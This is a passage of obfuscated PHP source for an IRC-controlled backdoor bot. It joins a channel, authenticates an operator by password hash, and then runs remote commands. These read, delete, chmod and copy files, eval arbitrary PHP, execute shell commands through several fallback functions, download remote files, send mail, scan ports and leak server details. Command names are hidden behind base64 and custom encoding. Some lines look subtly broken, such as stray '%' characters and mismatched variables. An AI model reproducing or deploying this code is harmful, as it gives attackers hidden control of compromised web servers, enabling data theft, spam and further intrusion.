f2(b64('USER'))." ".f8($v1['mrnd'])." 127.0.0.1 localhost :$v9");
f7($v6, f2(b64('NICK'))." $v9");
while(!feof($v6))
{
$v9 = trim(fgets($v6, 512));
$v10 = explode(" ", $v9);
if(($v9 == $v4))
continue;
if(isset($v10[0]) && $v10[0] == f2(b64('PING')))
{
f7($v6, f2(b64('PONG'))." ".$v10[1]);
}
else if(isset($v10[1]) && $v10[1] == f2(b64('001')))
{
f7($v6, f2(b64('MODE'))." $v9 ".f4($v1['mo']));
f7($v6, f2(b64('JOIN'))." ".f4($v1['ch'])." ".f4($v1['ke']));
}
%
else if(isset($v11[1]) && $v11[1] == f2(b64('433')))
{
f7($v6, f2(b64('NICK'))." $v9");
}
else if(isset($v10[1]) && isset($v3[$v10[1]]))
{
unset($v3[$v10[1]]);
}
else if(isset($v10[1])
&&($v10[1] == f2(b64('PRIVMSG')) || $v10[1] == "332"))
{
$v12 = strstr($v9, " :");
$v12 = substr($v12, 2);
$v11 = explode(" ", $v12);
$v13 = $v10[0];
$v14 = explode("!", $v13);
$v14 = substr($v14[0], 1);
%$v15 = FALSE;
if($v11[0] == "\1".f2(b64('VERSION'))."\1")
{
f7($v6,
"NOTICE ".$v14." :\1".
f2(b64('VERSION'))." ".f4($v1['ve'])."\1");
}
for($i1 = 0; $i1 < count($v11); $i1++)
{
if($v11[$i1] == "-s")
{
$v15 = TRUE;
}
}
if($v10[1] == "332")
{
$v16 = $v10[3];
}
else if($v10[2] == $v9)
{
$v16 = $v14;
}
else
{
$v16 = $v10[2];
}
if($v11[0] == PHP_OS)
{
array_shift($v11);
}
if(substr($v11[0], 0, 1) == $v1['tr'])
{
if(isset($v3[$v13]) || $v10[1] == "332")
{
switch(substr($v11[0], 1))
{
case f10("sKM="):
if($v10[1] != "332")
{
$v3[$v13] = FALSE;
f11($v6, $v15, $v16, htmen(b64('out')));
}
break;
case f10('qGWaoKKb'):
f7($v6, f2(b64('QUIT :I QUIT')));
fclose($v6);
exit(0);
break;
case f10('tpWs'):
if(count($v11) > 1)
{
f7($v6, substr($v12, strlen($v11[0])));
}
break;
case f10("sKc="):
if(isset($v11[1]))
{
$v17 = $v11[1];
}
else
{
$v17 = getcwd();
}
if(is_dir($v17))
{
if(($o1 = opendir($v17)))
{
f11($v6,
$v15,
$v16,
f2
(b64('Dir// Now listing:')).
" \2".$v17."\2");
while(($k1 = readdir($o1)) !== FALSE)
{
if($k1 != "." && $k1 != "..")
{
f11($v6,
$v15,
$v16,
">(".
filetype
($v17."/".$k1).") $k1");
sleep(1);
}
}
closedir();
}
else
{
f11($v6,
$v15,
$v16,
f2
(b64('Dir// Unable to list contents of')).
" \2".$v17."\2");
}
}
else
{
f11($v6,
$v15,
$v16,
f2(b64('Dir//')).
" \2".$v17."\2 ".
f2(b64('is not a dir!')));
}
break;
case f10('p5Wp'):
if(count($v11) > 1)
{
if(is_file($v11[1]))
{
if(($k2 = fopen($v11[1], "r")))
{
f11($v6,
$v15,
$v16,
f2
(b64('CAT// Now reading file:')).
" \2".$v11[1]."\2");
while(!feof($k2))
{
$m1 = trim(fgets($k2, 256));
f11($v6, $v15, $v16, "> $m1");
sleep(1);
}
f11($v6, $v15, $v16, "> [EOF]");
}
else
{
f11($v6,
$v15,
$v16,
f2
(b64('CAT// Couldn't open')).
" \2".$v11[1]."\2 for reading.");
}
}
else
{
f11($v6,
$v15,
$v16,
f2(b64('CAT//')).
" \2".$v11[1].
"\2 ".f2(b64('is not a file')));
}
}
break;
case f10('tKuZ'):
f11($v6, $v15,
$v16,
f2(b64('PWD// Current dir:'))." ".getcwd());
break;
case f10("p5g="):
if(count($v11) > 1)
{
if(chdir($v11[1]))
{
f11($v6,
$v15,
$v16,
f2
(b64('CD// Changed dir to')).
" ".$v11[1]);
}
else
{
f11($v6,
$v15,
$v16,
f2
(b64('CD// Failed to change dir')));
}
}
break;
case f10("tqE="):
if(count($v11) > 1)
{
if(unlink($v11[1]))
{
f11($v6,
$v15,
$v16,
f2
(b64('RM// Deleted'))." \2".
$v11[1]."\2");
}
else
{
f11($v6,
$v15,
$v16,
f2
(b64('RM// Failed to delete')).
" \2".$v11[1]."\2");
}
}
break;
case f10('uKOqlZs='):
if(count($v11) > 1)
{
if(touch($v11[1]))
{
f11($v6,
$v15,
$v16,
f2
(b64('Touch// Touched')).
" \2".$v11[1]."\2");
}
else
{
f11($v6,
$v15,
$v16,
f2
(b64('Touch// Failed to touch')).
" \2".$v11[1]."\2");
}
}
break;
case f10('t62inpySoA=='):
if(count($v11) > 2)
{
if(symlink($v11[1], $v11[2]))
{
f11($v6,
$v15,
$v16,
f2
(b64('SymLink// Symlinked')).
" \2".$v11[2]."\2 To \2".$v11[1]."\2");
}
else
{
f11($v6,
$v15,
$v16,
f2
(b64('SymLink// Failed to link')).
" \2".$v11[2]."\2 To \2".$v11[1]."\2");
}
}
break;
case f10('p5ykqaE='):
if(count($v11) > 2)
{
if(chown($v11[1], $v11[2]))
{
f11($v6,
$v15,
$v16,
f2
(b64('Chown// Chowned')).
" \2".$v11[1]."\2 To \2".$v11[2]."\2");
}
else
{
f11($v6,
$v15,
$v16,
f2
(b64('Chown// Failed to chown')).
" \2".$v11[1]."\2 To \2".$v11[2]."\2");
}
}
break;
case f10('p5yioZc='):
if(count($v11) > 2)
{
if(chmod($v11[1], $v11[2]))
{
f11($v6,
$v15,
$v16,
f2
(b64('Chmod// Chmodded')).
" \2".$v11[1].
"\2 with permissions \2".$v11[2]."\2");
}
else
{
f11($v6,
$v15,
$v16,
f2
(b64('Chmod// Failed to chmod')).
" \2".$v11[1]."\2");
}
}
break;
case f10('sZ+Zm6U='):
if(count($v11) > 1)
{
if(mkdir($v11[1]))
{
f11($v6,
$v15,
$v16,
f2
(b64('MKDir// Created directory')).
" \2".$v11[1]."\2");
}
else
{
f11($v6,
$v15,
$v16,
f2
(b64('MKDir// Failed to create directory')).
" \2".$v11[1]."\2");
}
}
break;
case f10('tqGZm6U='):
if(count($v11) > 1)
{
if(rmdir($v11[1]))
{
f11($v6,
$v15,
$v16,
f2
(b64('RMDir// Removed directory')).
" \2".$v11[1]."\2");
}
else
{
f11($v6,
$v15,
$v16,
f2
(b64('RMDir// Failed to remove directory')).
" \2".$v11[1]."\2");
}
}
break;
case f10("p6Q="):
if(count($v11) > 2)
{
if(copy($v11[1], $v11[2]))
{
f11($v6,
$v15,
$v16,
f2
(b64('CP// Copied'))." \2".
$v11[1]."\2 to \2".$v11[2]."\2");
}
else
{
f11($v6,
$v15,
$v16,
f2
(b64('CP// Failed to copy')).
" \2".$v11[1]."\2 to \2".$v11[2]."\2");
}
}
break;
case f10('sZWeng=='):
if(count($v11) > 4)
{
$p099fb995346f3 = "From: <".$v11[2].">\r\n";
if(mail
($v11[1], $v11[3],
substr($v12, $v11[4]), $p099fb995346f3))
{
f11($v6,
$v15,
$v16,
f2
(b64('Mail//')).
" Message sent to \2".$v11[1]."\2");
}
else
{
f11($v6,
$v15,
$v16, f2(b64('Mail//'))." Send failure");
}
}
break;
case f10('sZ+ilmg='):
f11($v6, $v15,
$v16, f2(b64('MD5//'))." ".md5($v11[1]));
break;
case f10('qKKo'):
if(isset($v11[1]))
{
$m3 = explode(".", $v11[1]);
if(count($m3) == 4
&& is_numeric($m3[0])
&& is_numeric($m3[1])
&& is_numeric($m3[2])
&& is_numeric($m3[3]))
{
f11($v6,
$v15,
$v16,
f2
(b64('DNS//'))." ".
$v11[1]." -> ".
gethostbyaddr($v11[1]));
}
else
{
f11($v6,
$v15,
$v16,
f2(b64('DNS//')).
" ".$v11[1].
" -> ".gethostbyname($v11[1]));
}
}
break;
case f10('tpmoppSWqQ=='):
f7($v6, f2(b64('QUIT :QUIT...')));
fclose($v6);
f3();
break;
case f10("tqI="):
if(isset($v11[1]))
{
$v9 = f6((int) $v11[1]);
f7($v6, f2(b64('NICK'))." $v9");
}
else
{
$v9 = f6($v1['mrnd']);
f7($v6, f2(b64('NICK'))." $v9");
}
break;
case f10('tJyl'):
if(count($v11) > 1)
{
eval(substr($v12, strlen($v11[0])));
}
break;
case f10('q5mp'):
if(count($v11) > 2)
{
if(!($k2 = fopen($v11[2], "w")))
{
f11($v6,
$v15,
$v16,
f2
(b64('Get// Permission denied')));
}
else
{
if(!($e2 = file($v11[1])))
{
f11($v6,
$v15,
$v16,
f2
(b64('Get// Bad URL/DNS error')));
}
else
{
for($i1 = 0; $i1 < count($e2); $i1++)
{
fwrite($k2, $e2[$i1]);
}
f11($v6,
$v15,
$v16,
f2
(b64('Get//'))." \2".
$v11[1].
"\2 downloaded to \2".
$v11[2]."\2");
}
fclose($k2);
}
}
break;
case f10("sp0="):
f11($v6, $v15,
$v16,
f2(b64('NetInfo//')).
" IP: ".$_SERVER['SERVER_ADDR'].
" Hostname: ".$_SERVER['SERVER_NAME']);
break;
case f10("t50="):
f11($v6, $v15,
$v16,
f2(b64('Sysinfo//')).
" [User: ".get_current_user().
"] [PID: ".getmypid().
"] [Version: PHP ".phpversion().
"] [OS: ".PHP_OS.
"] [Server_software: ".
$_SERVER['SERVER_SOFTWARE'].
"] [Server_name: ".
$_SERVER['SERVER_NAME'].
"] [Admin: ".
$_SERVER['SERVER_ADMIN'].
"] [Docroot: ".
$_SERVER['DOCUMENT_ROOT'].
"] [HTTP Host: ".
$_SERVER['HTTP_HOST']."] [URL: ".
$_SERVER['REQUEST_URI']."]");
break;
case f10('tKOnpqKUmuw='):
if(isset($v11[1], $v11[2]))
{
if(fsockopen
($v11[1],(int) $v11[2], $t1, $v2, 5))
{
f11($v6,
$v15,
$v16,
"".
f2
(b64('PortChk//'))." ".
$v11[1].":".$v11[2]." is \2Open\2");
}
else
{
f11($v6,
$v15,
$v16,
"".
f2
(b64('PortChk//'))." ".
$v11[1].":".$v11[2]." is \2Closed\2");
}
}
break;
case f10('uaKWn5g='):
f11($v6, $v15,
$v16, f2(b64('Uname//'))." ".php_uname());
break;
case f10("rZg="):
f11($v6, $v15,
$v16, f2(b64('ID//'))." ".getmypid());
break;
case f10('p6GZ'):
if(count($v11) > 1)
{
$p1dccadfed7bcb =
popen(substr($v12, strlen($v11[0])), "r");
while(!feof($p1))
{
$k4 = trim(fgets($p1, 512));
if(strlen($k4) > 0)
{
f11($v6, $v15, $v16, "> ".$k4);
sleep(1);
}
}
f11($v6, $v15, $v16, f2(b64('> [EOF]')));
}
break;
case f10('qayalaiYmg=='):
f14(substr($v12, strlen($v11[0])));
break;
}
}
else
{
switch(substr($v11[0], 1))
{
case f10("bg=="):
if(isset($v11[1])
&& md5($v11[1]) ==
f4($v1['pa'])
&& preg_match(f4($v1['ha']), $v13))
{
f11($v6, $v15, $v16, f2(b64('Ready// Ok')));
$v3[$v13] = TRUE;
}
else
{
f11($v6, FALSE,
f4($v1
['ch']),
f2(b64('Ready// rejected')));
}
break;
}
}
}
}
$v4 = $v9;
}
fclose($v6);
sleep(3);
f3();
}
else
{
shuffle($v5);
f3();
}
}
function
f7($s2, $v12)
{
fwrite($s2, "$v12\r\n");
}
function
f11($s2, $v15, $v16, $v12)
{
if($v15 != TRUE)
{
f7($s2, f2(b64('PRIVMSG'))." $v16 :$v12");
}
}
function
f10($y1)
{
$l2 = '';
$y1 = base64_decode($y1);
for($i1 = 0; $i1 < strlen($y1); $i1++)
{
$r4 = substr($y1, $i1, 1);
$x4 =
substr(f2
(b64('4523$5~321443425^fdGsdfG#$6@353@$5@#$5@54475&45&6%7%^^8^&*@!~#4~23432$@#!4!23$3%34%2#$5#@$5234%6%4678^&!@3D')),
($i1 %
strlen(f2
(b64('4523$5~321443425^fdGsdfG#$6@353@$5@#$5@54475&45&6%7%^^8^&*@!~#4~23432$@#!4!23$3%34%2#$5#@$5234%6%4678^&!@3D'))))
- 1, 1);
$r4 = chr(ord($r4) - ord($x4));
$l2. = $r4;
}
return $l2;
}
function
f6($w5)
{
for($i1 = 0; $i1 < $w5; $i1++)
$t6. = chr(mt_rand(0, 25) + 97);
if(posix_getegid() == 0)
$t6 = "r-".$t6;
return $t6;
}
function
f14($n1)
{
$y3 = '';
if(!empty($n1))
{
if(function_exists('exec'))
{
@exec($n1, $y3);
$y3 = join("\n", $y3);
}
else if(function_exists('shell_exec'))
{
$y3 = @shell_exec($n1);
}
else if(function_exists('system'))
{
@ob_start();
@system($n1);
$y3 = @ob_get_contents();
@ob_end_clean();
}
else if(function_exists('passthru'))
{
@ob_start();
@passthru($n1);
$y3 = @ob_get_contents();
@ob_end_clean();
}
else if(@is_resource($k8 = @popen($n1, "r")))
{
$y3 = "";
while(!@feof($k8))
{
$y3. = @fread($k8, 1024);
}
@pclose($k8);
}
}
return $y3;
}
function
f4($y1)
{
$l1 = '';
$y1 = base64_decode($y1);
for($i1 = 0; $i1 < strlen($y1); $i1++)
{
$r1 = substr($y1, $i1, 1);
$x1 =
substr(f2
(b64('3@!#!@$^&*^&@#$!@#!@#!$#%#$%#$%e32@34@hTh4@we5635^!@#*^7FHGE$@%@#@#$@#!@#$!@#@!#$#%#$%^%&^%&%^&*SDF#@$!FAW$FAASDE')),
($i1 %
strlen(f2
(b64('3@!#!@$^&*^&@#$!@#!@#!$#%#$%#$%e32@34@hTh4@we5635^!@#*^7FHGE$@%@#@#$@#!@#$!@#@!#$#%#$%^%&^%&%^&*SDF#@$!FAW$FAASDE'))))
- 1, 1);
$r1 = chr(ord($r1) - ord($x1));
$l1. = $r1;
}
return $l1;
}
function
f8($w1)
{
$t2 = "";
for($i1 = 0; $i1 < $w1; $i1++)
$t2. = chr(mt_rand(0, 25) + 97);
return $t2;
}
// main();
?>